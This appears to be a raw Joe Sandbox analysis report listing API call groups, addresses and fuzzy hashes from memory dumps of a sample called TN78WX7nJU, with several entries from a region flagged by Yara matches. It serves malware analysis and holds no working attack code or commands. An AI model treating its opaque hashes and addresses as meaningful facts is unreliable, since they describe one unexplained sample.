                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2630251706-0
                                                                                                                                                                                                                                                                • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000005), ref: 00401FAF
                                                                                                                                                                                                                                                                • UpdateWindow.USER32 ref: 00401FB7
                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000), ref: 00401FCB
                                                                                                                                                                                                                                                                • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Window$Show$MoveUpdate
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1339878773-0
                                                                                                                                                                                                                                                                • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 024A934A
                                                                                                                                                                                                                                                                  • Part of subcall function 024A9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024A92C6
                                                                                                                                                                                                                                                                  • Part of subcall function 024A9297: ___AdjustPointer.LIBCMT ref: 024A92E1
                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 024A935F
                                                                                                                                                                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024A9370
                                                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 024A9398
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 737400349-0
                                                                                                                                                                                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                • Instruction ID: dd7902a0b168ea5682338f3260862cf75cc75035effb19eefb516b138c717781
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1B011732100148BBCF125E96CC50EEB3F7AEF58754F05441AFE0896120D372E861EBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                                                                                                                                                                                                                                  • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                                                                                                                                                                                                                                  • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                                                                                                                                                                                                                                • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                                                                                                                                                                                                                                • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                                                                                                                                                                                                                                • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 737400349-0
                                                                                                                                                                                                                                                                • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378), ref: 024B51C8
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024B2213), ref: 024B51D4
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024B51E2
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                • Instruction ID: 66b8974f1e5ee743916ce639f37f79aeb4b5764888c21c1d9fe9e225dac22382
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8001F736A02322ABC7234F799C44E97FB98AF46FA27540631F906E7240C720D941CAF4
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3177248105-0
                                                                                                                                                                                                                                                                • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024A63AF
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024A63C3
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024A63DB
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024A63F3
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                • Instruction ID: 3bec27d665a3d3717b1a3808e02f7a4e078401cc44891030c8c417e18893cc7d
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9601D632600114B7CF16EE5AC860AAF779E9F65750F05005BEC21AB381DAB0ED128BA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF
                                                                                                                                                                                                                                                                  • Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
                                                                                                                                                                                                                                                                  • Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8
                                                                                                                                                                                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8
                                                                                                                                                                                                                                                                  • Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                • Instruction ID: a6b3322d4b83997d53398a9e39bde1422cbac09e96d07a3371cc48c22dd9c190
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C1117C76400204AFC715DF65C880ACAFBF9BF59320B014A1EE9568B591DBB0A914CBA0
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                                                                                                                                                                                                                                • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                                                                                                                                                                                                                                • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 78362717-0
                                                                                                                                                                                                                                                                • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF
                                                                                                                                                                                                                                                                  • Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
                                                                                                                                                                                                                                                                  • Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8
                                                                                                                                                                                                                                                                • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
                                                                                                                                                                                                                                                                • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8
                                                                                                                                                                                                                                                                  • Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 2250070497-0
                                                                                                                                                                                                                                                                • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                • Instruction ID: be4a4b3d581b6e66caf45d2d5b2ad42161672202806dbcd7acd34a4724b8dfce
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 58012D76410604ABC714DF66C881EDAF7E9FF59310F008A1EE55687550DBB0F954CF60
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 024850D1
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
                                                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 0248512B
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                • Instruction ID: 5a16ee00e9a584453990e86ad8480014c5bc187271322bba7073226ba3c9bbe9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5018872D21208AFDB04FFA5C480BADBBB2BF54315F50802FD055AB280DB749584CFA1
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 02485B8D
                                                                                                                                                                                                                                                                  • Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 02485BD8
                                                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 02485BE7
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02485BF7
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                • Instruction ID: 00f1e3fa62b0cdf8d9b5797c7a9d18da9a67237fba80cabd9777ea8b6fb86896
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 200148729212089FDB04FFA5D484BADBBB1BF54325F50802FD055AB280DBB89984CFA5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                                                                                                                                                                                                                                  • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                                                                                                                                                                                                                                • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                                                                                                                                                                                                                                • __Getcoll.LIBCPMT ref: 00405980
                                                                                                                                                                                                                                                                • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1836011271-0
                                                                                                                                                                                                                                                                • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C170
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C180
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C190
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C1A4
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                • Instruction ID: 924b2012034765f75be822235018525e58794493cc26a8d2fd43b45b17ca7db3
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EA01C47A504149BBDF139E94EC828AE3F66AF6E350F088517F91884170D732C6B1EF85
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                                                                                                                                                                                                                                • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215102585.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Compare_exchange_acquire_4std::_
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 3973403980-0
                                                                                                                                                                                                                                                                • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::LoadLibraryAndCreateThread.LIBCONCRT ref: 0249378C
                                                                                                                                                                                                                                                                  • Part of subcall function 02492B16: ___crtGetTimeFormatEx.LIBCMT ref: 02492B2C
                                                                                                                                                                                                                                                                  • Part of subcall function 02492B16: Concurrency::details::ReferenceLoadLibrary.LIBCONCRT ref: 02492B4B
                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 024937A8
                                                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 024937BE
                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 024937CC
                                                                                                                                                                                                                                                                  • Part of subcall function 024928EC: SetThreadPriority.KERNEL32(?,?), ref: 024928F8
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2480000_TN78WX7nJU.jbxd
                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                • API ID: Concurrency::details::LibraryLoadThread$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateErrorException@8FormatLastPriorityReferenceThrowTime___crt
                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                • API String ID: 1674182817-0
                                                                                                                                                                                                                                                                • Opcode ID: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                • Instruction ID: 8622be4b170f9abb9ea511820c72f3ce94b38cb5fe23583529433e6e242052c8
                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a2b92864322f138175f3ab6e0d311330129b0ba518dce86d5fca6d40f2995285
                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5EF0A7B2A002153ADB20FB765C0AFBB3EAC9B11B51F50496FB905E6181EED9D4048AB5
                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 02491342
                                                                                                                                                                                                                                                                  • Part of subcall function 02490BB4: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 02490BD6
                                                                                                                                                                                                                                                                  • Part of subcall function 02490BB4: Concurrency::details::RegisterAsyncTimerAndLoadLibrary.LIBCONCRT ref: 02490BF7
                                                                                                                                                                                                                                                                • Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 02491355
                                                                                                                                                                                                                                                                • Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 02491361
                                                                                                                                                                                                                                                                • Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 0249136A
                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.4215584573.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
